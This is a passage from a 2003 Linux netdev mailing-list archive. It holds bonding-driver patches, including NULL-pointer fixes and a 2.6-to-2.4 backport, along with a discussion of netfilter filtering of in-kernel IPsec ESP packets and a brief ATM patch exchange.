+#ifdef HOW_CAN_THIS_BE_CALLED + /* if we are sending arp packets and don't know * the target hw address, save it so we don't need * to use a broadcast address. @@ -3302,6 +3315,7 @@ memcpy(arp_target_hw_addr, eth_hdr->h_dest, ETH_ALEN); } } +#endif read_lock(&bond->lock); ========= third one ========== --- linux-2.4.22-pre9-bk/drivers/net/bonding/bond_main.c Wed Jul 30 15:09:15 2003 +++ linux-2.4.22-pre9-bk-bond/drivers/net/bonding/bond_main.c Wed Jul 30 15:12:11 2003 @@ -1594,11 +1594,14 @@ #endif bond_set_slave_inactive_flags(new_slave); } - read_lock_irqsave(&(((struct in_device *)slave_dev->ip_ptr)->lock), rflags); - ifap= &(((struct in_device *)slave_dev->ip_ptr)->ifa_list); - ifa = *ifap; - my_ip = ifa->ifa_address; - read_unlock_irqrestore(&(((struct in_device *)slave_dev->ip_ptr)->lock), rflags); + if (((struct in_device *)slave_dev->ip_ptr) != NULL) { + read_lock_irqsave(&(((struct in_device *)slave_dev->ip_ptr)->lock), rflags); + ifap= &(((struct in_device *)slave_dev->ip_ptr)->ifa_list); + ifa = *ifap; + if (ifa != NULL) + my_ip = ifa->ifa_address; + read_unlock_irqrestore(&(((struct in_device *)slave_dev->ip_ptr)->lock), rflags); + } /* if there is a primary slave, remember it */ if (primary != NULL) { From laforge@netfilter.org Wed Jul 30 07:27:33 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 07:27:41 -0700 (PDT) Received: from coruscant.gnumonks.org (mail@coruscant.franken.de [193.174.159.226]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UERUFl028044 for ; Wed, 30 Jul 2003 07:27:32 -0700 Received: from [192.168.200.2] (helo=sunbeam.gnumonks.org) by coruscant.gnumonks.org with esmtp (TLSv1:DES-CBC3-SHA:168) (Exim 4.20) id 19hrvL-0001ts-RA; Wed, 30 Jul 2003 16:27:28 +0200 Received: from laforge by sunbeam.gnumonks.org with local (Exim 4.20) id 19hrsB-0001I7-Gi; Wed, 30 Jul 2003 16:24:11 +0200 Date: Wed, 30 Jul 2003 16:24:11 +0200 From: Harald Welte To: netfilter-devel@lists.netfilter.org Cc: netfilter@lists.netfilter.org, 
netdev@oss.sgi.com Subject: Re: port-based filtering of ESP packets with in-kernel IPsec? Message-ID: <20030730142411.GD4553@sunbeam.de.gnumonks.org> Mail-Followup-To: Harald Welte , netfilter-devel@lists.netfilter.org, netfilter@lists.netfilter.org, netdev@oss.sgi.com References: <1059540296.16545.305.camel@k7.localnet> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="kvUQC+jR9YzypDnK" Content-Disposition: inline In-Reply-To: <1059540296.16545.305.camel@k7.localnet> X-Operating-system: Linux sunbeam 2.6.0-test1-nftest X-Date: Today is Sweetmorn, the 65th day of Confusion in the YOLD 3169 User-Agent: Mutt/1.5.4i X-archive-position: 4377 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: laforge@netfilter.org Precedence: bulk X-list: netdev --kvUQC+jR9YzypDnK Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jul 29, 2003 at 11:44:57PM -0500, Rick Kennell wrote: > I asked about this last week in the general netfilter list, but it > appears that most folks are still using FreeS/WAN for IPsec. yes, most people will use a stable kernel rather than a development one ;) > I'm using the in-kernel IPsec and want to be able to filter ESP packets > based on protocol or port number. These values are encapsulated in the > ESP payload and are unavailable to netfilter. If I were using > FreeS/WAN, I could use standard netfilter techniques on the ipsec0 > device. With the in-kernel IPsec, there's no extra pseudo-device with > which to examine unencapsulated ESP packets. true. > It looks too me like netfilter sees the packet as ESP in all chains in > all tables. (I'd be delighted to be corrected.) I haven't investigated the new in-kernel ESP implementation that far, but your observation sounds reasonable (although I don't say this is the desired behaviour). 
> Since ESP packets that reach the mangle INPUT chain are destined for a > local process, why not unencapsulate them just before that point? Because NF_IP_LOCAL_IN (like all other hooks) is in the layer 3 stack, and decapsulating ESP is inside a layer 4 protocol - thus it happens after the ip stack has handed it over to the esp4 protocol engine. > It might still be nice to have an indication that this was once an ESP > packet for filtering, but that could be done by setting a mark in the > mangle PREROUTING chain. no. My preferred solution was something like adding a netfilter hook to the xfrm4 engine, exactly after decapsulation / decryption of one layer, i.e. after xfrm_type.input was called. iptables could then register the INPUT chain (or probably even a separate POSTXFRM chain) in order to filter on the respective packets. > I realize that this would probably require some heavy lifting in the > network layer to accomplish this nesting of functionality. yes, this is why this should be discussed on the netdev list (Cc'ed). I think this needs to be sorted out before 2.6.0-final will be released. Any comments are appreciated. > Am I missing something obvious? -- - Harald Welte http://www.netfilter.org/ ============================================================================ "Fragmentation is like classful addressing -- an interesting early architectural error that shows how much experimentation was going on while IP was being designed."
-- Paul Vixie --kvUQC+jR9YzypDnK Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2 (GNU/Linux) iD8DBQE/J9ULXaXGVTD0i/8RApDKAJ9Khp7Ne+MXX8f1gKyXpIwDUWegdgCfYY6g xKhlDsfWItUGVBtroYz8EOs= =qqO8 -----END PGP SIGNATURE----- --kvUQC+jR9YzypDnK-- From chas@locutus.cmf.nrl.navy.mil Wed Jul 30 07:35:19 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 07:35:25 -0700 (PDT) Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil [134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UEZIFl028905 for ; Wed, 30 Jul 2003 07:35:19 -0700 Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h6UEZDsG010062; Wed, 30 Jul 2003 10:35:13 -0400 (EDT) Message-Id: <200307301435.h6UEZDsG010062@ginger.cmf.nrl.navy.mil> To: Christoph Hellwig cc: "David S. Miller" , netdev@oss.sgi.com Reply-To: chas3@users.sourceforge.net Subject: Re: [PATCH][ATM][2.4] export try_atm_clip_ops not atm_clip_ops_mutex In-reply-to: Your message of "Wed, 30 Jul 2003 10:24:37 BST." <20030730102437.B3901@infradead.org> Date: Wed, 30 Jul 2003 10:32:31 -0400 From: chas williams X-Spam-Score: () hits=-0.9 X-Virus-Scanned: NAI Completed X-Scanned-By: MIMEDefang 2.30 (www . roaringpenguin . com / mimedefang) X-archive-position: 4378 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: chas@cmf.nrl.navy.mil Precedence: bulk X-list: netdev In message <20030730102437.B3901@infradead.org>,Christoph Hellwig writes: >On Tue, Jul 29, 2003 at 10:33:27PM -0700, David S. Miller wrote: >> On Tue, 29 Jul 2003 13:57:05 -0400 >> chas williams wrote: >> >> > please apply to 2.4 -- thanks >> > >> > [atm]: export try_atm_clip_ops not atm_clip_ops_mutex >> >> Applied, will go into 2.4.23-preX > >Hmm, this looks like a fix for modular compilation and should >probably go into 2.4.22.. 
i would prefer it to be applied to 2.4.22 but if it can't be done it can't be done. i am not pressed. From aj@dungeon.inka.de Wed Jul 30 07:51:01 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 07:51:08 -0700 (PDT) Received: from mail.inka.de (mail@quechua.inka.de [193.197.184.2]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UEoxFl032217 for ; Wed, 30 Jul 2003 07:51:00 -0700 Received: from dungeon.inka.de (uucp@[127.0.0.1]) by mail.inka.de with uucp (rmailwrap 0.5) id 19hsI5-0003sQ-00; Wed, 30 Jul 2003 16:50:57 +0200 Received: from [192.168.3.1] (unknown [192.168.3.1]) by dungeon.inka.de (Postfix) with ESMTP id E5CC212E4C7; Wed, 30 Jul 2003 16:50:54 +0200 (CEST) Subject: Re: port-based filtering of ESP packets with in-kernel IPsec? From: Andreas Jellinghaus To: Harald Welte Cc: netfilter-devel@lists.netfilter.org, netfilter@lists.netfilter.org, netdev@oss.sgi.com In-Reply-To: <20030730142411.GD4553@sunbeam.de.gnumonks.org> References: <1059540296.16545.305.camel@k7.localnet> <20030730142411.GD4553@sunbeam.de.gnumonks.org> Content-Type: text/plain Message-Id: <1059576701.4586.20.camel@simulacron> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.3 Date: 30 Jul 2003 16:51:41 +0200 Content-Transfer-Encoding: 7bit X-archive-position: 4379 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: aj@dungeon.inka.de Precedence: bulk X-list: netdev Hi, if you are using ipsec from kernel 2.6.* there is no "ipsec0" interface, and thus using netfilter isn't as easy as it was with freeswan. three ways to solve the problem, only tried the first one so far: 1.) configure ipsec in tunnel mode, add your tunnel ip to the outgoing interface, change the default route to set the source ip to the tunnel ip. note: there is no routing step after encapsulating a packet with ipsec; there was one with freeswan, so this is different. 2.)
set a fwmark on an esp packet; it should still be there after unpacking/decryption. didn't try this one.

3.) do not use the built-in tunneling. use an explicit ipip tunnel. that way you have the interface, can use it in netfilter, can route into it, and the interface will set the right source address.

[netfilter]
incoming encrypted packets are seen as ESP/AH in INPUT and then as decrypted packets in INPUT or FORWARD.
outgoing packets are only seen as ESP in OUTPUT.

> > Since ESP packets that reach the mangle INPUT chain are destined for a
> > local process, why not unencapsulate them just before that point?

INPUT only means the ESP packet will be decrypted/unencapsulated. after that the decrypted packet will show up in INPUT or FORWARD.

> no. My preferred solution was something like adding a netfilter hook to
> the xfrm4 engine, exactly after decapsulation / decryption of one layer,
> i.e. after xfrm_type.input was called.
>
> iptables could then register the INPUT chain (or probably even a
> separate POSTXFRM chain) in order to filter on the respective packets.

you can already filter incoming packets. The problem is you don't know if they came in the way they look now, or if they came in via ESP packets and got decrypted.

maybe decryption/unencapsulating could leave a mark on the packet, so we know packets without that mark came in without ipsec and are bad / attempts to access resources without ipsec? (maybe fwmark works on that. or an explicit ipip tunnel, so you have "ipip0" or something as incoming interface).

> Any comments are appreciated.
Regards, Andreas From laforge@netfilter.org Wed Jul 30 08:20:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 08:20:23 -0700 (PDT) Received: from coruscant.gnumonks.org (mail@coruscant.franken.de [193.174.159.226]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UFKFFl002004 for ; Wed, 30 Jul 2003 08:20:15 -0700 Received: from [192.168.200.2] (helo=sunbeam.gnumonks.org) by coruscant.gnumonks.org with esmtp (TLSv1:DES-CBC3-SHA:168) (Exim 4.20) id 19hskP-0002ur-0B; Wed, 30 Jul 2003 17:20:14 +0200 Received: from laforge by sunbeam.gnumonks.org with local (Exim 4.20) id 19hshB-0001N1-To; Wed, 30 Jul 2003 17:16:53 +0200 Date: Wed, 30 Jul 2003 17:16:53 +0200 From: Harald Welte To: Andreas Jellinghaus Cc: netfilter-devel@lists.netfilter.org, netfilter@lists.netfilter.org, netdev@oss.sgi.com Subject: Re: port-based filtering of ESP packets with in-kernel IPsec? Message-ID: <20030730151653.GB5161@sunbeam.de.gnumonks.org> Mail-Followup-To: Harald Welte , Andreas Jellinghaus , netfilter-devel@lists.netfilter.org, netfilter@lists.netfilter.org, netdev@oss.sgi.com References: <1059540296.16545.305.camel@k7.localnet> <20030730142411.GD4553@sunbeam.de.gnumonks.org> <1059576701.4586.20.camel@simulacron> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="WYTEVAkct0FjGQmd" Content-Disposition: inline In-Reply-To: <1059576701.4586.20.camel@simulacron> X-Operating-system: Linux sunbeam 2.6.0-test1-nftest X-Date: Today is Sweetmorn, the 65th day of Confusion in the YOLD 3169 User-Agent: Mutt/1.5.4i X-archive-position: 4380 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: laforge@netfilter.org Precedence: bulk X-list: netdev --WYTEVAkct0FjGQmd Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Jul 30, 2003 at 04:51:41PM +0200, Andreas Jellinghaus wrote: =20 > 
[netfilter]
> incoming encrypted packets are seen as ESP/AH in INPUT
> and then as decrypted packets in INPUT or FORWARD.

ok, great.

> outgoing packets are only seen as ESP in OUTPUT.

this could be a problem. I think there are quite a number of users who want to impose packet filtering on outgoing locally-originated packets... and obviously you want to do that at some point _before_ you hide everything behind crypto.

> you can already filter incoming packets. The problem is you
> don't know if they came in the way they look now, or if they
> came in via ESP packets and got decrypted.
>
> maybe decryption/unencapsulating could leave a mark on the
> packet, so we know packets without that mark came in without
> ipsec and are bad / attempts to access resources without ipsec?
> (maybe fwmark works on that. or an explicit ipip tunnel, so you
> have "ipip0" or something as incoming interface).

This sounds a bit like the existing problem with bridgewalling. They also have no idea of where the packet originally came from (at least before the physdev stuff was introduced as a solution to this).

--
- Harald Welte http://www.netfilter.org/
============================================================================
"Fragmentation is like classful addressing -- an interesting early architectural error that shows how much experimentation was going on while IP was being designed."
-- Paul Vixie --WYTEVAkct0FjGQmd Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2 (GNU/Linux) iD8DBQE/J+FlXaXGVTD0i/8RArRjAJ9fqF6G+ARS6eXqnPYBIDyuFftoXQCdH2vT 2xabS84rlPcSCPbOyNMpYNI= =rQbl -----END PGP SIGNATURE----- --WYTEVAkct0FjGQmd-- From amir.noam@intel.com Wed Jul 30 10:07:37 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 10:07:42 -0700 (PDT) Received: from caduceus.sc.intel.com (fmr04.intel.com [143.183.121.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UH7bFl016561 for ; Wed, 30 Jul 2003 10:07:37 -0700 Received: from petasus.sc.intel.com (petasus.sc.intel.com [10.3.253.4]) by caduceus.sc.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6UH6Bh08316 for ; Wed, 30 Jul 2003 17:06:12 GMT Received: from fmsmsxvs042.fm.intel.com (fmsmsxvs042.fm.intel.com [132.233.42.128]) by petasus.sc.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6UH65i18020 for ; Wed, 30 Jul 2003 17:06:05 GMT Received: from jrslxjul4.npdj.intel.com ([10.12.254.188]) by fmsmsxvs042.fm.intel.com (NAVGW 2.5.2.11) with SMTP id M2003073010121710772 ; Wed, 30 Jul 2003 10:12:19 -0700 Content-Type: text/plain; charset="us-ascii" From: Amir Noam To: fubar@us.ibm.com, jgarzik@pobox.com Subject: [PATCH 5/5] [bonding] backport 2.6 changes to 2.4 Date: Wed, 30 Jul 2003 20:07:27 +0300 User-Agent: KMail/1.4.3 Cc: bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200307302007.27122.amir.noam@intel.com> X-archive-position: 4386 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: amir.noam@intel.com Precedence: bulk X-list: netdev Backported from 2.6: Use a linked list to handle numerous bond devices instead of a static array. 
Also, fix handling of errors in bonding_init(): gracefully unregister and deallocate all previously created bond devices. Amir diff -Nuarp linux-2.4.22-pre9/drivers/net/bonding/bond_main.c linux-2.4.22-pre9-devel/drivers/net/bonding/bond_main.c --- linux-2.4.22-pre9/drivers/net/bonding/bond_main.c Wed Jul 30 19:14:10 2003 +++ linux-2.4.22-pre9-devel/drivers/net/bonding/bond_main.c Wed Jul 30 19:14:11 2003 @@ -515,9 +515,7 @@ static struct bond_parm_tbl bond_lacp_tb { NULL, -1}, }; -static int first_pass = 1; -static struct bonding *these_bonds = NULL; -static struct net_device *dev_bonds = NULL; +static LIST_HEAD(bond_dev_list); MODULE_PARM(max_bonds, "i"); MODULE_PARM_DESC(max_bonds, "Max number of bonded devices"); @@ -3495,47 +3493,13 @@ static int bond_read_proc(char *buf, cha static int bond_event(struct notifier_block *this, unsigned long event, void *ptr) { - struct bonding *this_bond = (struct bonding *)these_bonds; - struct bonding *last_bond; struct net_device *event_dev = (struct net_device *)ptr; + struct net_device *master = event_dev->master; - /* while there are bonds configured */ - while (this_bond != NULL) { - if (this_bond == event_dev->priv ) { - switch (event) { - case NETDEV_UNREGISTER: - /* - * remove this bond from a linked list of - * bonds - */ - if (this_bond == these_bonds) { - these_bonds = this_bond->next_bond; - } else { - for (last_bond = these_bonds; - last_bond != NULL; - last_bond = last_bond->next_bond) { - if (last_bond->next_bond == - this_bond) { - last_bond->next_bond = - this_bond->next_bond; - } - } - } - return NOTIFY_DONE; - - default: - return NOTIFY_DONE; - } - } else if (this_bond->device == event_dev->master) { - switch (event) { - case NETDEV_UNREGISTER: - bond_release(this_bond->device, event_dev); - break; - } - return NOTIFY_DONE; - } - this_bond = this_bond->next_bond; + if ((event == NETDEV_UNREGISTER) && (master != NULL)) { + bond_release(master, event_dev); } + return NOTIFY_DONE; } @@ -3543,19 +3507,40 @@ 
static struct notifier_block bond_netdev notifier_call: bond_event, }; +static void bond_deinit(struct net_device *dev) +{ + struct bonding *bond = dev->priv; + + list_del(&bond->bond_list); + +#ifdef CONFIG_PROC_FS + remove_proc_entry("info", bond->bond_proc_dir); + remove_proc_entry(dev->name, proc_net); +#endif +} + +static void bond_free_all(void) +{ + struct bonding *bond, *nxt; + + list_for_each_entry_safe(bond, nxt, &bond_dev_list, bond_list) { + struct net_device *dev = bond->device; + + bond_deinit(dev); + unregister_netdev(dev); + kfree(dev); + } +} + static int __init bond_init(struct net_device *dev) { - bonding_t *bond, *this_bond, *last_bond; + struct bonding *bond; int count; #ifdef BONDING_DEBUG printk (KERN_INFO "Begin bond_init for %s\n", dev->name); #endif - bond = kmalloc(sizeof(struct bonding), GFP_KERNEL); - if (bond == NULL) { - return -ENOMEM; - } - memset(bond, 0, sizeof(struct bonding)); + bond = dev->priv; /* initialize rwlocks */ rwlock_init(&bond->lock); @@ -3565,7 +3550,6 @@ static int __init bond_init(struct net_d bond->current_slave = NULL; bond->current_arp_slave = NULL; bond->device = dev; - dev->priv = bond; /* Initialize the device structure. */ switch (bond_mode) { @@ -3590,7 +3574,6 @@ static int __init bond_init(struct net_d break; default: printk(KERN_ERR "Unknown bonding mode %d\n", bond_mode); - kfree(bond); return -EINVAL; } @@ -3599,14 +3582,6 @@ static int __init bond_init(struct net_d dev->stop = bond_close; dev->set_multicast_list = set_multicast_list; dev->do_ioctl = bond_ioctl; - - /* - * Fill in the fields of the device structure with ethernet-generic - * values. 
- */ - - ether_setup(dev); - dev->set_mac_address = bond_set_mac_address; dev->tx_queue_len = 0; dev->flags |= IFF_MASTER|IFF_MULTICAST; @@ -3640,7 +3615,6 @@ static int __init bond_init(struct net_d if (bond->bond_proc_dir == NULL) { printk(KERN_ERR "%s: Cannot init /proc/net/%s/\n", dev->name, dev->name); - kfree(bond); return -ENOMEM; } bond->bond_proc_dir->owner = THIS_MODULE; @@ -3652,25 +3626,12 @@ static int __init bond_init(struct net_d printk(KERN_ERR "%s: Cannot init /proc/net/%s/info\n", dev->name, dev->name); remove_proc_entry(dev->name, proc_net); - kfree(bond); return -ENOMEM; } bond->bond_proc_info_file->owner = THIS_MODULE; #endif /* CONFIG_PROC_FS */ - if (first_pass == 1) { - these_bonds = bond; - register_netdevice_notifier(&bond_netdev_notifier); - first_pass = 0; - } else { - last_bond = these_bonds; - this_bond = these_bonds->next_bond; - while (this_bond != NULL) { - last_bond = this_bond; - this_bond = this_bond->next_bond; - } - last_bond->next_bond = bond; - } + list_add_tail(&bond->bond_list, &bond_dev_list); return 0; } @@ -3710,9 +3671,6 @@ static int __init bonding_init(void) int no; int err; - /* Find a name for this unit */ - static struct net_device *dev_bond = NULL; - printk(KERN_INFO "%s", version); /* @@ -3763,12 +3721,6 @@ static int __init bonding_init(void) max_bonds, 1, INT_MAX, BOND_DEFAULT_MAX_BONDS); max_bonds = BOND_DEFAULT_MAX_BONDS; } - dev_bond = dev_bonds = kmalloc(max_bonds*sizeof(struct net_device), - GFP_KERNEL); - if (dev_bond == NULL) { - return -ENOMEM; - } - memset(dev_bonds, 0, max_bonds*sizeof(struct net_device)); if (miimon < 0) { printk(KERN_WARNING @@ -3959,47 +3911,62 @@ static int __init bonding_init(void) primary = NULL; } + rtnl_lock(); + err = 0; for (no = 0; no < max_bonds; no++) { - dev_bond->init = bond_init; - - err = dev_alloc_name(dev_bond,"bond%d"); + struct net_device *dev; + + dev = alloc_netdev(sizeof(struct bonding), "", ether_setup); + if (!dev) { + err = -ENOMEM; + goto out_err; + } + + 
err = dev_alloc_name(dev, "bond%d"); + if (err < 0) { + kfree(dev); + goto out_err; + } + + /* bond_init() must be called after alloc_net_dev() (for the + * /proc files), but before register_netdevice(), because we + * need to set function pointers. + */ + err = bond_init(dev); + if (err < 0) { + kfree(dev); + goto out_err; + } + + SET_MODULE_OWNER(dev); + + err = register_netdevice(dev); if (err < 0) { - kfree(dev_bonds); - return err; + bond_deinit(dev); + kfree(dev); + goto out_err; } - SET_MODULE_OWNER(dev_bond); - if (register_netdev(dev_bond) != 0) { - kfree(dev_bonds); - return -EIO; - } - dev_bond++; } + + rtnl_unlock(); + register_netdevice_notifier(&bond_netdev_notifier); + return 0; + +out_err: + rtnl_unlock(); + + /* free and unregister all bonds that were successfully added */ + bond_free_all(); + + return err; } static void __exit bonding_exit(void) { - struct net_device *dev_bond = dev_bonds; - struct bonding *bond; - int no; - unregister_netdevice_notifier(&bond_netdev_notifier); - - for (no = 0; no < max_bonds; no++) { - -#ifdef CONFIG_PROC_FS - bond = (struct bonding *) dev_bond->priv; - remove_proc_entry("info", bond->bond_proc_dir); - remove_proc_entry(dev_bond->name, proc_net); -#endif - unregister_netdev(dev_bond); - kfree(dev_bond->priv); - - dev_bond->priv = NULL; - dev_bond++; - } - kfree(dev_bonds); + bond_free_all(); } module_init(bonding_init); diff -Nuarp linux-2.4.22-pre9/drivers/net/bonding/bonding.h linux-2.4.22-pre9-devel/drivers/net/bonding/bonding.h --- linux-2.4.22-pre9/drivers/net/bonding/bonding.h Wed Jul 30 19:14:10 2003 +++ linux-2.4.22-pre9-devel/drivers/net/bonding/bonding.h Wed Jul 30 19:14:11 2003 @@ -104,7 +104,7 @@ typedef struct bonding { struct proc_dir_entry *bond_proc_dir; struct proc_dir_entry *bond_proc_info_file; #endif /* CONFIG_PROC_FS */ - struct bonding *next_bond; + struct list_head bond_list; struct net_device *device; struct dev_mc_list *mc_list; unsigned short flags; From amir.noam@intel.com Wed Jul 30 
10:07:11 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 10:07:14 -0700 (PDT) Received: from caduceus.sc.intel.com (fmr04.intel.com [143.183.121.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UH7AFl016328 for ; Wed, 30 Jul 2003 10:07:11 -0700 Received: from petasus.sc.intel.com (petasus.sc.intel.com [10.3.253.4]) by caduceus.sc.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6UH5jh07891 for ; Wed, 30 Jul 2003 17:05:45 GMT Received: from fmsmsxvs042.fm.intel.com (fmsmsxvs042.fm.intel.com [132.233.42.128]) by petasus.sc.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6UH5di17555 for ; Wed, 30 Jul 2003 17:05:39 GMT Received: from jrslxjul4.npdj.intel.com ([10.12.254.188]) by fmsmsxvs042.fm.intel.com (NAVGW 2.5.2.11) with SMTP id M2003073010115127255 ; Wed, 30 Jul 2003 10:11:52 -0700 Content-Type: text/plain; charset="us-ascii" From: Amir Noam To: fubar@us.ibm.com, jgarzik@pobox.com Subject: [PATCH 1/5] [bonding] backport 2.6 changes to 2.4 Date: Wed, 30 Jul 2003 20:07:00 +0300 User-Agent: KMail/1.4.3 Cc: bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200307302007.00926.amir.noam@intel.com> X-archive-position: 4382 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: amir.noam@intel.com Precedence: bulk X-list: netdev Add list_for_each_entry_safe() Amir diff -Nuarp linux-2.4.22-pre9/include/linux/list.h linux-2.4.22-pre9-devel/include/linux/list.h --- linux-2.4.22-pre9/include/linux/list.h Wed Jul 30 19:14:01 2003 +++ linux-2.4.22-pre9-devel/include/linux/list.h Wed Jul 30 19:14:02 2003 @@ -227,6 +227,19 @@ static inline void list_splice_init(stru pos = list_entry(pos->member.next, typeof(*pos), member), \ prefetch(pos->member.next)) +/** + * list_for_each_entry_safe - iterate over list of given type safe 
against removal of list entry + * @pos: the type * to use as a loop counter. + * @n: another type * to use as temporary storage + * @head: the head for your list. + * @member: the name of the list_struct within the struct. + */ +#define list_for_each_entry_safe(pos, n, head, member) \ + for (pos = list_entry((head)->next, typeof(*pos), member), \ + n = list_entry(pos->member.next, typeof(*pos), member); \ + &pos->member != (head); \ + pos = n, n = list_entry(n->member.next, typeof(*n), member)) + #endif /* __KERNEL__ || _LVM_H_INCLUDE */ #endif From amir.noam@intel.com Wed Jul 30 10:07:19 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 10:07:21 -0700 (PDT) Received: from hermes.sc.intel.com (fmr03.intel.com [143.183.121.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UH7IFl016362 for ; Wed, 30 Jul 2003 10:07:19 -0700 Received: from petasus.sc.intel.com (petasus.sc.intel.com [10.3.253.4]) by hermes.sc.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6UH2ot24580 for ; Wed, 30 Jul 2003 17:02:50 GMT Received: from fmsmsxvs042.fm.intel.com (fmsmsxvs042.fm.intel.com [132.233.42.128]) by petasus.sc.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6UH5li17709 for ; Wed, 30 Jul 2003 17:05:47 GMT Received: from jrslxjul4.npdj.intel.com ([10.12.254.188]) by fmsmsxvs042.fm.intel.com (NAVGW 2.5.2.11) with SMTP id M2003073010120008806 ; Wed, 30 Jul 2003 10:12:01 -0700 Content-Type: text/plain; charset="us-ascii" From: Amir Noam To: fubar@us.ibm.com, jgarzik@pobox.com Subject: [PATCH 2/5] [bonding] backport 2.6 changes to 2.4 Date: Wed, 30 Jul 2003 20:07:09 +0300 User-Agent: KMail/1.4.3 Cc: bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200307302007.09735.amir.noam@intel.com> X-archive-position: 4383 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: 
netdev-bounce@oss.sgi.com X-original-sender: amir.noam@intel.com Precedence: bulk X-list: netdev Export alloc_netdev() Amir diff -Nuarp linux-2.4.22-pre9/drivers/net/net_init.c linux-2.4.22-pre9-devel/drivers/net/net_init.c --- linux-2.4.22-pre9/drivers/net/net_init.c Wed Jul 30 19:14:03 2003 +++ linux-2.4.22-pre9-devel/drivers/net/net_init.c Wed Jul 30 19:14:04 2003 @@ -71,7 +71,7 @@ */ -static struct net_device *alloc_netdev(int sizeof_priv, const char *mask, +struct net_device *alloc_netdev(int sizeof_priv, const char *mask, void (*setup)(struct net_device *)) { struct net_device *dev; @@ -97,6 +97,7 @@ static struct net_device *alloc_netdev(i return dev; } +EXPORT_SYMBOL(alloc_netdev); static struct net_device *init_alloc_dev(int sizeof_priv) { diff -Nuarp linux-2.4.22-pre9/include/linux/netdevice.h linux-2.4.22-pre9-devel/include/linux/netdevice.h --- linux-2.4.22-pre9/include/linux/netdevice.h Wed Jul 30 19:14:03 2003 +++ linux-2.4.22-pre9-devel/include/linux/netdevice.h Wed Jul 30 19:14:04 2003 @@ -801,6 +801,8 @@ extern void tr_setup(struct net_device extern void fc_setup(struct net_device *dev); extern void fc_freedev(struct net_device *dev); /* Support for loadable net-drivers */ +extern struct net_device *alloc_netdev(int sizeof_priv, const char *name, + void (*setup)(struct net_device *)); extern int register_netdev(struct net_device *dev); extern void unregister_netdev(struct net_device *dev); /* Functions used for multicast support */ From amir.noam@intel.com Wed Jul 30 10:07:25 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 10:07:29 -0700 (PDT) Received: from hermes.sc.intel.com (fmr03.intel.com [143.183.121.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UH7OFl016435 for ; Wed, 30 Jul 2003 10:07:24 -0700 Received: from petasus.sc.intel.com (petasus.sc.intel.com [10.3.253.4]) by hermes.sc.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6UH2ut24670 for ; Wed, 30 Jul 2003 17:02:56 
